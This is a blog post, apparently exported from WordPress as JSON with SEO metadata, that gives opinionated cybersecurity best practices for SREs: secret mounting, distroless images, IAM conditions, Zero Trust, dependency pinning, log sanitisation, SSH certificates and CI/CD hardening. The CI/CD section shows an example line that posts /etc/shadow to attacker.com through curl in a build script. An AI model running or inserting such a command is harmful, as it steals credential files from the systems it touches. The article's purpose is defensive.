{"id":4783,"date":"2026-05-08T21:51:58","date_gmt":"2026-05-08T16:21:58","guid":{"rendered":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/"},"modified":"2026-05-08T21:51:58","modified_gmt":"2026-05-08T16:21:58","slug":"10-essential-cybersecurity-best-practices-to-stay-safe-5","status":"publish","type":"post","link":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/","title":{"rendered":"10 Essential Cybersecurity Best Practices to Stay Safe"},"content":{"rendered":"<h2><span class=\"ez-toc-section\" id=\"Your_Security_Checklist_is_a_Liability_Real-World_Cybersecurity_Best_Practices_for_the_Cynical_SRE\"><\/span>Your Security Checklist is a Liability: Real-World Cybersecurity Best Practices for the Cynical SRE<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>I once took down an entire payment gateway because I thought I was being clever with secret rotation. It was 3:00 AM. I had scripted a rolling update for our production Vault cluster, but I forgot to account for the token TTL on our legacy sidecars. 
When the old tokens expired, the sidecars couldn&#8217;t re-authenticate because the new Vault nodes were still in a <code>sealed<\/code> state, waiting for manual unseal keys that were stored in a &#8220;secure&#8221; physical safe three miles away from my home office. The site stayed dark for four hours while I drove through a thunderstorm to get a piece of paper with a hex string on it. <\/p>\n<p>That is the reality of &#8220;cybersecurity best&#8221; practices. They look great on a SOC2 compliance spreadsheet, but they fail spectacularly when they meet the friction of real-world infrastructure. We spend millions on &#8220;Next-Gen AI-Driven Threat Detection&#8221; but then we leave a <code>.git<\/code> directory in a public S3 bucket or hardcode a <code>STRIPE_LIVE_KEY<\/code> in a Dockerfile because &#8220;it&#8217;s just for the staging build.&#8221; If you&#8217;re looking for a list of tools to buy, close this tab. If you want to know how to stop your infrastructure from becoming a headline, let&#8217;s talk about the trade-offs that actually matter.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"The_Environment_Variable_Trap\"><\/span>The Environment Variable Trap<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Most &#8220;cybersecurity best&#8221; guides tell you to store secrets in environment variables. This is lazy advice. Environment variables are essentially public knowledge once someone gets a shell on your container. Anyone who can run <code>ps aux<\/code> or <code>cat \/proc\/1\/environ<\/code> can see your database credentials. If you use a crash reporting tool like Sentry or Datadog, and your app throws an unhandled exception, there is a non-zero chance your entire environment block is being shipped to a third-party SaaS platform in a stack trace.<\/p>\n<p>Stop doing this. Use a filesystem-based secret injection. If you are on Kubernetes, use the Secrets Store CSI Driver. It mounts secrets as files in a <code>tmpfs<\/code> volume. 
When the pod dies, the secrets vanish from memory. They aren&#8217;t persisted to disk, and they aren&#8217;t sitting in the process environment block for every child process to inherit.<\/p>\n<pre><code>\n# This is what a real SecretProviderClass looks like. \n# Don't use the 'secretObjects' sync unless you absolutely need \n# to support legacy apps that can't read from a file.\napiVersion: secrets-store.csi.x-k8s.io\/v1\nkind: SecretProviderClass\nmetadata:\n  name: api-secrets-vault\nspec:\n  provider: vault\n  parameters:\n    vaultAddress: \"https:\/\/vault.internal.production:8200\"\n    roleName: \"api-service-role\"\n    objects: |\n      - objectName: \"db-password\"\n        secretPath: \"secret\/data\/production\/api\"\n        secretKey: \"password\"\n      - objectName: \"api-key\"\n        secretPath: \"secret\/data\/production\/api\"\n        secretKey: \"key\"\n<\/code><\/pre>\n<p>Pro-tip: If you must use environment variables for legacy reasons, at least use a wrapper that clears them after the process starts. But honestly? Just fix the app to read from <code>\/var\/run\/secrets\/<\/code>. It takes ten minutes of coding and saves you a week of incident response.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"The_Alpine_Linux_Myth\"><\/span>The Alpine Linux Myth<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>The industry has a strange obsession with Alpine Linux for Docker images. &#8220;It&#8217;s small!&#8221; they say. &#8220;The attack surface is tiny!&#8221; they claim. Here is what they don&#8217;t tell you: Alpine uses <code>musl<\/code> instead of <code>glibc<\/code>. I have lost count of the number of times I&#8217;ve seen mysterious performance degradation or DNS resolution bugs because a Python or Node.js library expected <code>glibc<\/code> behavior and got <code>musl<\/code> instead. <\/p>\n<p>From a security perspective, Alpine is also a pain. 
Because it&#8217;s so minimal, the moment you need to debug something in production, you realize you don&#8217;t even have <code>curl<\/code> or <code>dig<\/code>. So what do developers do? They add <code>apk add --no-cache curl bind-tools<\/code> to the Dockerfile. Now you&#8217;ve just manually rebuilt a larger attack surface, but with the added bonus of potential binary incompatibilities.<\/p>\n<p>Use <code>debian-slim<\/code> or, better yet, Google&#8217;s <code>distroless<\/code> images. Distroless contains only your application and its runtime dependencies. No shell. No package manager. No <code>ls<\/code>. If an attacker gets an RCE (Remote Code Execution) in a distroless container, they can&#8217;t even <code>cd<\/code> into a directory to look around. They have to bring their own toolset, which is a much higher bar to clear.<\/p>\n<ul>\n<li>Distroless images reduce the number of &#8220;Critical&#8221; and &#8220;High&#8221; vulnerabilities in your Snyk\/Trivy scans by about 80% compared to standard Ubuntu images.<\/li>\n<li>You avoid the <code>LD_PRELOAD<\/code> trickery that attackers use to hijack library calls.<\/li>\n<li>Your CI\/CD pipeline runs faster because you aren&#8217;t pulling 200MB of bloated OS layers.<\/li>\n<li>Debugging is harder, yes. Use <code>kubectl debug<\/code> with an ephemeral container instead of baking tools into your production image.<\/li>\n<\/ul>\n<h2><span class=\"ez-toc-section\" id=\"IAM_The_%E2%80%9CAction_%E2%80%9D_Sin\"><\/span>IAM: The &#8220;Action: *&#8221; Sin<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Identity and Access Management (IAM) is where security goes to die. I&#8217;ve audited &#8220;secure&#8221; AWS environments where the <code>S3-Read-Only<\/code> policy was attached to a role that also had <code>iam:PassRole<\/code> permissions. 
Congratulations, you just gave that user administrative access to the entire account via an EC2 instance profile escalation.<\/p>\n<p>The &#8220;cybersecurity best&#8221; approach to IAM is not just &#8220;Least Privilege.&#8221; It&#8217;s &#8220;Least Privilege with Conditions.&#8221; If you have a Lambda function that needs to write to an S3 bucket, don&#8217;t just give it <code>s3:PutObject<\/code> on <code>arn:aws:s3:::my-bucket\/*<\/code>. Use conditions to restrict the IP address, the encryption status, and even the time of day if you&#8217;re feeling spicy.<\/p>\n<pre><code>\n{\n    \"Version\": \"2012-10-17\",\n    \"Statement\": [\n        {\n            \"Sid\": \"AllowPutObjectOnlyWithEncryption\",\n            \"Effect\": \"Allow\",\n            \"Action\": \"s3:PutObject\",\n            \"Resource\": \"arn:aws:s3:::customer-data-uploads-prod\/*\",\n            \"Condition\": {\n                \"StringEquals\": {\n                    \"s3:x-amz-server-side-encryption\": \"aws:kms\"\n                },\n                \"ArnEquals\": {\n                    \"aws:PrincipalArn\": \"arn:aws:iam::123456789012:role\/api-worker-role\"\n                }\n            }\n        }\n    ]\n}\n<\/code><\/pre>\n<p>Note to self: Always check for <code>iam:CreateAccessKey<\/code> permissions. I once saw a developer create a &#8220;service account&#8221; user for a CI\/CD pipeline and give it this permission so it could &#8220;manage its own keys.&#8221; An attacker compromised the CI\/CD, generated 500 access keys, and used them to bypass rate limits while exfiltrating the entire database. <\/p>\n<h2><span class=\"ez-toc-section\" id=\"The_False_Security_of_the_VPN\"><\/span>The False Security of the VPN<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>If your security strategy relies on &#8220;being on the VPN,&#8221; you are living in 2005. VPNs are a single point of failure. 
Once an attacker phishes a single employee and gets their VPN credentials (and bypasses the often-flimsy MFA), they are &#8220;inside&#8221; the network. From there, it&#8217;s a lateral movement playground. <\/p>\n<p>The &#8220;cybersecurity best&#8221; move is to move toward a Zero Trust architecture. Use something like Tailscale or Cloudflare Access. Every single request to an internal tool\u2014whether it&#8217;s your Jenkins instance or a staging DB\u2014should be authenticated and authorized at the application layer, not just the network layer. <\/p>\n<p>I&#8217;ve seen companies spend $50k on a hardware firewall while their internal Jira instance was running a version from 2018 with a known RCE. Because it was &#8220;behind the VPN,&#8221; they didn&#8217;t think it was a priority. Then a contractor&#8217;s laptop got infected with Emotet, and suddenly the &#8220;secure&#8221; internal network was a botnet node. <\/p>\n<p>Stop trusting the network. Start trusting the identity. Every internal service should require an OIDC (OpenID Connect) token. No exceptions. If your internal tool doesn&#8217;t support OIDC, put an <code>oauth2-proxy<\/code> in front of it. It&#8217;s a 5MB Go binary that saves you from a multi-million dollar breach.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Dependency_Hell_and_the_%E2%80%9CAudit%E2%80%9D_Lie\"><\/span>Dependency Hell and the &#8220;Audit&#8221; Lie<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Running <code>npm audit<\/code> is not a security strategy. It&#8217;s a way to generate noise that developers eventually learn to ignore. Most of the &#8220;vulnerabilities&#8221; reported by these tools are &#8220;Moderate&#8221; ReDoS (Regular Expression Denial of Service) bugs in build-time dependencies that will never see a single byte of production traffic. <\/p>\n<p>You need to prioritize. Focus on the supply chain. If you are pulling <code>latest<\/code> for any dependency, you are asking for a bad time. 
Pin your versions. Pin your hashes. <\/p>\n<pre><code>\n# Bad: You have no idea what version of the base image you're getting tomorrow\nFROM node:18\n\n# Better: You've pinned the version, but the tag can still be overwritten\nFROM node:18.16.0-slim\n\n# Best: You've pinned the SHA256 digest. This is immutable.\nFROM node:18.16.0-slim@sha256:e363026139158913989369836913691369136913691369136913691369136913\n<\/code><\/pre>\n<p>The same applies to your application code. Use <code>package-lock.json<\/code>, <code>go.sum<\/code>, or <code>requirements.txt<\/code> with hashes. I remember the <code>ua-parser-js<\/code> hijack in 2021. People who were pinning versions but not hashes still got hit because the attacker published a malicious version under an existing version number (though rare, it happens) or users were using ranges like <code>^0.7.28<\/code>. <\/p>\n<p>Pro-tip: Use a tool like Renovate or Dependabot, but configure it to only auto-merge &#8220;Patch&#8221; updates for non-critical libraries. For anything else, you need a human to look at the changelog. Yes, it&#8217;s slow. Yes, it&#8217;s &#8220;friction.&#8221; That&#8217;s the point.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Logging_The_Log4j_Lesson\"><\/span>Logging: The Log4j Lesson<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>We all remember December 2021. The world burned because a logging library was too powerful for its own good. But the real lesson of Log4j wasn&#8217;t &#8220;update your jars.&#8221; It was &#8220;don&#8217;t log what you don&#8217;t control.&#8221; <\/p>\n<p>I&#8217;ve seen SREs log the entire <code>User-Agent<\/code> string, the <code>X-Forwarded-For<\/code> header, and the full request body of every 400-level error. This is a goldmine for attackers. 
If I can inject a payload into a header that you then log, I can potentially trigger a vulnerability in your logging pipeline\u2014whether it&#8217;s Log4j, an Elasticsearch injection, or a buffer overflow in a legacy syslog-ng parser.<\/p>\n<p>Sanitize your logs. Use a structured logging library (like <code>zap<\/code> in Go or <code>structlog<\/code> in Python) and explicitly define the fields you want to capture. Never, ever log PII (Personally Identifiable Information). I once had to spend a weekend scrubbing 40TB of S3 logs because a junior dev decided to log the <code>auth_payload<\/code> which contained raw credit card numbers in plain text. <\/p>\n<pre><code>\n{\n  \"level\": \"error\",\n  \"ts\": 1625097600.123,\n  \"caller\": \"api\/handler.go:42\",\n  \"msg\": \"failed to process payment\",\n  \"request_id\": \"req_9a8b7c6d\",\n  \"user_id\": \"user_12345\",\n  \"error\": \"invalid expiry date\",\n  \"stacktrace\": \"...\" \n}\n<\/code><\/pre>\n<p>Note that we log the <code>user_id<\/code> and <code>request_id<\/code>, but not the <code>card_number<\/code> or the <code>cvv<\/code>. This seems obvious, but when you&#8217;re 12 hours into a production outage, &#8220;log everything&#8221; becomes a very tempting (and dangerous) mantra.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"The_SSH_Key_Management_Nightmare\"><\/span>The SSH Key Management Nightmare<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>If you are still manually adding <code>id_rsa.pub<\/code> strings to <code>authorized_keys<\/code> files, you are operating a ticking time bomb. People leave companies. People lose laptops. People &#8220;borrow&#8221; keys from coworkers. <\/p>\n<p>The &#8220;cybersecurity best&#8221; practice here is to stop using static SSH keys entirely. Use SSH Certificates. Netflix&#8217;s <code>BLESS<\/code> or HashiCorp Vault&#8217;s SSH secrets engine are the gold standard. 
A user authenticates with their SSO (Okta, Google, etc.), and in exchange, they get a short-lived (e.g., 1 hour) SSH certificate signed by your internal CA. <\/p>\n<p>If a laptop is stolen, the key is already expired. If an employee is fired, their SSO access is revoked, and they can no longer request new certificates. No more <code>authorized_keys<\/code> cleanup scripts that inevitably miss one server and leave a backdoor open for years.<\/p>\n<p>If you can&#8217;t do certificates yet, at least use <code>ProxyJump<\/code> through a bastion host that has mandatory MFA. And for the love of all that is holy, disable password authentication in <code>\/etc\/ssh\/sshd_config<\/code>:<\/p>\n<pre><code>\n# \/etc\/ssh\/sshd_config\nPasswordAuthentication no\nPubkeyAuthentication yes\nPermitRootLogin no\nMaxAuthTries 3\nAllowAgentForwarding no\nX11Forwarding no\n<\/code><\/pre>\n<h2><span class=\"ez-toc-section\" id=\"The_%E2%80%9CBreak_Glass%E2%80%9D_Procedure\"><\/span>The &#8220;Break Glass&#8221; Procedure<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Security is often at odds with availability. If you lock down your production environment so tightly that no one can access it, what happens when the database is deadlocking and the automated scripts are failing? <\/p>\n<p>You need a &#8220;Break Glass&#8221; procedure. This is a documented, tested way to gain emergency administrative access. 
It should involve:<\/p>\n<ul>\n<li>A physical or digital &#8220;vault&#8221; (like a 1Password for Teams vault) that requires multiple people to approve access.<\/li>\n<li>Immediate, high-priority alerting (PagerDuty, Slack, Email) the moment those credentials are used.<\/li>\n<li>A mandatory post-mortem every time the &#8220;Break Glass&#8221; is used to figure out why the standard, automated tools weren&#8217;t enough.<\/li>\n<li>Automatic rotation of the credentials immediately after the incident is resolved.<\/li>\n<li>Hardened logging that cannot be deleted by the &#8220;Break Glass&#8221; user (e.g., streaming logs to a separate, write-only AWS account).<\/li>\n<li>A clear definition of what constitutes an &#8220;emergency.&#8221;<\/li>\n<\/ul>\n<p>Without a Break Glass procedure, your SREs will find &#8220;creative&#8221; ways to bypass security controls when the pressure is on. And &#8220;creative&#8221; is just another word for &#8220;vulnerable.&#8221;<\/p>\n<h2><span class=\"ez-toc-section\" id=\"The_CICD_Pipeline_Your_Biggest_Vulnerability\"><\/span>The CI\/CD Pipeline: Your Biggest Vulnerability<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>We spend so much time hardening production, but we treat our CI\/CD pipelines like a playground. Your CI\/CD system (GitHub Actions, GitLab CI, Jenkins) has the keys to the kingdom. It can deploy code, it can modify infrastructure, and it often has access to your most sensitive secrets. <\/p>\n<p>If I&#8217;m an attacker, I&#8217;m not going to try to exploit your hardened Kubernetes cluster. I&#8217;m going to submit a PR to a random internal repo that adds a <code>curl -X POST -d @\/etc\/shadow attacker.com<\/code> line to your <code>build.sh<\/code>. 
If your CI\/CD isn&#8217;t configured to require approval for PRs from forks, or if it runs on every commit without oversight, I&#8217;m in.<\/p>\n<p>Cybersecurity best practices for CI\/CD:<\/p>\n<ol>\n<li><strong>OIDC for Cloud Access:<\/strong> Stop storing AWS Access Keys in GitHub Secrets. Use OIDC to get temporary credentials.<\/li>\n<li><strong>Isolated Runners:<\/strong> Don&#8217;t share runners between projects. A compromised build in a &#8220;test&#8221; project shouldn&#8217;t be able to steal secrets from a &#8220;production&#8221; project.<\/li>\n<li><strong>Immutable Build Artifacts:<\/strong> Build your image once, sign it (using Cosign\/Sigstore), and promote that exact image through your environments. Never rebuild the same code for staging and production.<\/li>\n<li><strong>Network Isolation:<\/strong> Your CI runners should not have unrestricted outbound internet access. They need to talk to your package registry and your cloud provider&#8217;s API. That&#8217;s it.<\/li>\n<\/ol>\n<p>I once saw a Jenkins server that had been &#8220;temporarily&#8221; given <code>AdministratorAccess<\/code> in AWS so it could debug a Terraform issue. It stayed that way for six months. When a plugin with a known vulnerability was exploited, the attacker didn&#8217;t just get the Jenkins server; they got the entire AWS organization. They started spinning up <code>p3.16xlarge<\/code> instances for crypto mining, and the company didn&#8217;t notice until the $40,000 bill arrived at the end of the month.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"The_Reality_of_%E2%80%9CCybersecurity_Best%E2%80%9D\"><\/span>The Reality of &#8220;Cybersecurity Best&#8221;<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>The truth is that &#8220;cybersecurity best&#8221; isn&#8217;t about a specific tool or a specific configuration. It&#8217;s about reducing the &#8220;Blast Radius.&#8221; You have to assume that every component of your system will be compromised at some point. 
The process, the container, the node, the network, the developer&#8217;s laptop\u2014they are all fallible. <\/p>\n<p>Your job as an SRE isn&#8217;t to build a wall that can&#8217;t be breached. It&#8217;s to build a system where a breach in one area doesn&#8217;t lead to a total collapse. This means defense in depth. It means mTLS between services. It means granular IAM roles. It means not being afraid to say &#8220;no&#8221; to a developer who wants to run their container as <code>root<\/code> because they&#8217;re too lazy to fix a permission issue in their <code>\/app\/data<\/code> folder.<\/p>\n<p>Stop chasing the hype. Stop buying the &#8220;AI-powered&#8221; blinky-light boxes. Fix your secrets, harden your images, and for the love of God, rotate your keys. Security is a boring, repetitive, and often thankless job. But it&#8217;s a lot better than being the person who has to explain to the board why the company&#8217;s entire database is for sale on a Telegram channel for $500 in Monero.<\/p>\n<p>If you can&#8217;t explain the technical trade-off of a security decision, you aren&#8217;t practicing security; you&#8217;re practicing superstition.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Your Security Checklist is a Liability: Real-World 
Cybersecurity Best Practices for the Cynical SRE I once took down an entire payment gateway because I thought I was being clever with secret rotation. It was 3:00 AM. I had scripted a rolling update for our production Vault cluster, but I forgot to account for the token &#8230; <a title=\"10 Essential Cybersecurity Best Practices to Stay Safe\" class=\"read-more\" href=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/\" aria-label=\"Read more  on 10 Essential Cybersecurity Best Practices to Stay Safe\">Read more<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-4783","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>10 Essential Cybersecurity Best Practices to Stay Safe - ITSupportWale<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"10 Essential Cybersecurity Best Practices to Stay Safe - ITSupportWale\" \/>\n<meta property=\"og:description\" content=\"Your Security Checklist is a Liability: Real-World Cybersecurity Best Practices for the Cynical SRE I once took down an entire payment gateway because I thought I was being clever with secret rotation. It was 3:00 AM. I had scripted a rolling update for our production Vault cluster, but I forgot to account for the token ... 
Read more\" \/>\n<meta property=\"og:url\" content=\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/\" \/>\n<meta property=\"og:site_name\" content=\"ITSupportWale\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Itsupportwale-298547177495978\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-08T16:21:58+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/itsupportwale.com\/blog\/wp-content\/uploads\/2021\/05\/android-chrome-512x512-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"512\" \/>\n\t<meta property=\"og:image:height\" content=\"512\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Techie\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Techie\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"13 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/\"},\"author\":{\"name\":\"Techie\",\"@id\":\"https:\/\/itsupportwale.com\/blog\/#\/schema\/person\/8c5a2b3d36396e0a8fd91ec8242fd46d\"},\"headline\":\"10 Essential Cybersecurity Best Practices to Stay Safe\",\"datePublished\":\"2026-05-08T16:21:58+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/\"},\"wordCount\":2329,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/itsupportwale.com\/blog\/#organization\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/\",\"url\":\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/\",\"name\":\"10 Essential Cybersecurity Best Practices to Stay Safe - 
ITSupportWale\",\"isPartOf\":{\"@id\":\"https:\/\/itsupportwale.com\/blog\/#website\"},\"datePublished\":\"2026-05-08T16:21:58+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/itsupportwale.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"10 Essential Cybersecurity Best Practices to Stay Safe\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/itsupportwale.com\/blog\/#website\",\"url\":\"https:\/\/itsupportwale.com\/blog\/\",\"name\":\"ITSupportWale\",\"description\":\"Tips, Tricks, Fixed-Errors, Tutorials &amp; 
Guides\",\"publisher\":{\"@id\":\"https:\/\/itsupportwale.com\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/itsupportwale.com\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/itsupportwale.com\/blog\/#organization\",\"name\":\"itsupportwale\",\"url\":\"https:\/\/itsupportwale.com\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/itsupportwale.com\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/itsupportwale.com\/blog\/wp-content\/uploads\/2023\/09\/cropped-Logo-trans-without-slogan.png\",\"contentUrl\":\"https:\/\/itsupportwale.com\/blog\/wp-content\/uploads\/2023\/09\/cropped-Logo-trans-without-slogan.png\",\"width\":1119,\"height\":144,\"caption\":\"itsupportwale\"},\"image\":{\"@id\":\"https:\/\/itsupportwale.com\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/Itsupportwale-298547177495978\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/itsupportwale.com\/blog\/#\/schema\/person\/8c5a2b3d36396e0a8fd91ec8242fd46d\",\"name\":\"Techie\",\"sameAs\":[\"https:\/\/itsupportwale.com\",\"iswblogadmin\"],\"url\":\"https:\/\/itsupportwale.com\/blog\/author\/iswblogadmin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"10 Essential Cybersecurity Best Practices to Stay Safe - ITSupportWale","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/","og_locale":"en_US","og_type":"article","og_title":"10 Essential Cybersecurity Best Practices to Stay Safe - ITSupportWale","og_description":"Your Security Checklist is a Liability: Real-World Cybersecurity Best Practices for the Cynical SRE I once took down an entire payment gateway because I thought I was being clever with secret rotation. It was 3:00 AM. I had scripted a rolling update for our production Vault cluster, but I forgot to account for the token ... Read more","og_url":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/","og_site_name":"ITSupportWale","article_publisher":"https:\/\/www.facebook.com\/Itsupportwale-298547177495978","article_published_time":"2026-05-08T16:21:58+00:00","og_image":[{"width":512,"height":512,"url":"https:\/\/itsupportwale.com\/blog\/wp-content\/uploads\/2021\/05\/android-chrome-512x512-1.png","type":"image\/png"}],"author":"Techie","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Techie","Est. 
reading time":"13 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#article","isPartOf":{"@id":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/"},"author":{"name":"Techie","@id":"https:\/\/itsupportwale.com\/blog\/#\/schema\/person\/8c5a2b3d36396e0a8fd91ec8242fd46d"},"headline":"10 Essential Cybersecurity Best Practices to Stay Safe","datePublished":"2026-05-08T16:21:58+00:00","mainEntityOfPage":{"@id":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/"},"wordCount":2329,"commentCount":0,"publisher":{"@id":"https:\/\/itsupportwale.com\/blog\/#organization"},"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/","url":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/","name":"10 Essential Cybersecurity Best Practices to Stay Safe - ITSupportWale","isPartOf":{"@id":"https:\/\/itsupportwale.com\/blog\/#website"},"datePublished":"2026-05-08T16:21:58+00:00","breadcrumb":{"@id":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/itsupportwale.com\/blog\/10-essential-cybersecurity-best-practices-to-stay-safe-5\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/itsupportwale.com\/blog\/"},{"@type":"ListItem","position":2,"name":"10 
Essential Cybersecurity Best Practices to Stay Safe"}]},{"@type":"WebSite","@id":"https:\/\/itsupportwale.com\/blog\/#website","url":"https:\/\/itsupportwale.com\/blog\/","name":"ITSupportWale","description":"Tips, Tricks, Fixed-Errors, Tutorials &amp; Guides","publisher":{"@id":"https:\/\/itsupportwale.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/itsupportwale.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/itsupportwale.com\/blog\/#organization","name":"itsupportwale","url":"https:\/\/itsupportwale.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/itsupportwale.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/itsupportwale.com\/blog\/wp-content\/uploads\/2023\/09\/cropped-Logo-trans-without-slogan.png","contentUrl":"https:\/\/itsupportwale.com\/blog\/wp-content\/uploads\/2023\/09\/cropped-Logo-trans-without-slogan.png","width":1119,"height":144,"caption":"itsupportwale"},"image":{"@id":"https:\/\/itsupportwale.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Itsupportwale-298547177495978"]},{"@type":"Person","@id":"https:\/\/itsupportwale.com\/blog\/#\/schema\/person\/8c5a2b3d36396e0a8fd91ec8242fd46d","name":"Techie","sameAs":["https:\/\/itsupportwale.com","iswblogadmin"],"url":"https:\/\/itsupportwale.com\/blog\/author\/iswblogadmin\/"}]}},"_links":{"self":[{"href":"https:\/\/itsupportwale.com\/blog\/wp-json\/wp\/v2\/posts\/4783","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/itsupportwale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/its